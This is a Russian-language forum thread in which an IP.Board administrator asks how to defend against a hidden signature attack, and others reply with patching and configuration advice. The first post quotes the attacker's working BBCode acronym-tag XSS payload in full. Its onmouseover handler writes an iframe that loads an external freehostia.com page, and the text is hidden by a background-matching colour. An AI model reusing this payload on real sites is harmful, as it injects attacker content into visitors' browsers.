Перейти к публикации
Дизайн и модификация IPS Community IPBSkinsBETA
Поиск в
  • Дополнительно...
Искать результаты, содержащие...
Искать результаты в...
fagediba

Пытаются взломать что делать

Рекомендованные сообщения

03/07/10 09:23 (изменено)

Есть форум ipb

 

один пользователь прислал в ЛС некое сообщение, при прокрутке скролом страницы перекинуло на другой сайт и вернуло обратно. В подписи юзера оказался следующий код

 

[color="#EEF2F7"][acronym=test1[acronym=test2 onmouseover=document.write("\x3Ciframe\x20src=http://****.freehostia.com/\x20frameborder=0\x20width=1024\x20height=3186\x20scrolling=no\x3E\x3C/iframe\x3E");document.close(); ]_]___________________________________________________________________________[/acronym]_[/acronym][/color]

 

 

вот как работает тег акронима:

[acronym='Laugh Out Loud']lol[/acronym]


<acronym title='{option}'>{content}</acronym>

 

Как защититься и что делать?

 

тема обсуждается тут

http://ipbskins.ru/forum/topic5228.html

http://forum.searchengines.ru/showthread.php?p=6476617

http://forum.antichat.ru/showthread.php?p=1960546

http://forums.ibresource.ru/index.php?showtopic=60138

Изменено пользователем fagediba

Поделиться сообщением


Ссылка на сообщение
Есть форум ipb

IP.Board версия: 1.x ?

 

Как защититься и что делать?

1. Использовать не ломанную версию форума со всеми патчами безопасности.

 

2. Разрешить HTML в сообщениях?

Если функция включена, то пользователи могут использовать HTML в личных сообщениях. Рекомендуем отключить данную функцию из соображений безопасности.

 

3. Разрешить HTML в подписи?

Разрешение данной функции НЕ рекомендуется, если вы не полностью доверяете пользователям, которым разрешено добавлять подпись.

Поделиться сообщением


Ссылка на сообщение

236 форум, хтмл теги атакующий не использовал

Поделиться сообщением


Ссылка на сообщение

Атакующий скрыл подпись под цвет фона

color="#EEF2F7"

 

Можно ли как-то запретить использовать в теге любые цвета? только те оставить, которые black, red и тд.?

 

Тогда левые скрипты на странице хотя бы будут видны

Поделиться сообщением


Ссылка на сообщение
тема обсуждается тут

Смысл так плодить тему....

 

К тому, что написал Ritsuka, добавить нечего.

 

+ жалоба в freehostia.com

Поделиться сообщением


Ссылка на сообщение

> К тому, что написал Ritsuka, добавить нечего.

 

ну запретил я акроним, запретил онмаузовер, и что, это остановит чтоли? значит используя другие теги построят свою конструкцию. Нужно чтобы грамотно кто-нибудь составил изменения в обработчик парсера

Поделиться сообщением


Ссылка на сообщение

bb- коды в подписях отключила...

Спасибо.

Поделиться сообщением


Ссылка на сообщение

Подписи тут ни при чем. Текст можно разместить в любом месте, в посте допустим. Извиняюсь что расплодил код, сейчас его уже не убрать, я не думал что так сложно будет этому противодействовать

 

http://forums.ibresource.ru/index.php?showtopic=60138

 

вон там ритсука в подписи разместила (или разместил?) - навести если табличка вылезает

Поделиться сообщением


Ссылка на сообщение
Подписи тут ни при чем. Текст можно разместить в любом месте, в посте допустим.

Угу.

 

 

вон там ритсука в подписи разместила (или разместил?) - навести если табличка вылезает

Разместил (ОН). Я читал молча, добавить было нечего

Поделиться сообщением


Ссылка на сообщение
03/08/10 15:55 (изменено)

Официальный фикс xss с акронимом в 2.3.6

 

Изменения

 

sources/classes/bbcode/class_bbcode_core.php

Изменено пользователем Ph-A
Код битый, нельзя использовать

Поделиться сообщением


Ссылка на сообщение
Официальный фикс xss с акронимом в 2.3.6

Arhar на ibresource его раскритиковал. И привел другое решение

http://forums.ibresource.ru/index.php?s=&a...st&p=363021

Поделиться сообщением


Ссылка на сообщение

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас

  • Сейчас на странице   0 пользователей

    Нет пользователей, просматривающих эту страницу.

×
×
  • Создать...